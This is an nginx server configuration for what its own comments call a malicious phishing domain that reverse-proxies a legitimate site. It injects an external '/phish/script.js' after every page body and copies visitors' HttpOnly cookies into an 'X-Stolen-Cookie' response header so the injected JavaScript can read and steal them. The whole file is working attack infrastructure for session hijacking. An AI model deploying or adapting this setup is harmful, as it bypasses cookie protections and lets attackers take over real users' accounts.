server {
    listen 80;
    # The conf for the malicious domain. It forwards traffic to the legit domain
    # with a few modifications that allow us to pull off this attack.
    server_name searching.party 107.170.50.16;

    allow all;

    root   /usr/share/nginx/html;
    index  index.html index.htm;

    location / {
        proxy_pass  http://localhost:8080;
        proxy_next_upstream error timeout invalid_header http_500 http_502 http_503 http_504;
        proxy_redirect off;
        proxy_buffering off;
        proxy_set_header         Host            searching.party;
        #proxy_set_header        X-Real-IP       $remote_addr;
        #proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
        # These are the two most important lines. The first one inserts our malicious
        # javascript after the body of the webpage. The second puts the http-only cookie in a
        # location that we can actually access via javascript.
	    add_after_body /phish/script.js;
	    add_header		X-Stolen-Cookie	$http_cookie;

    }

}
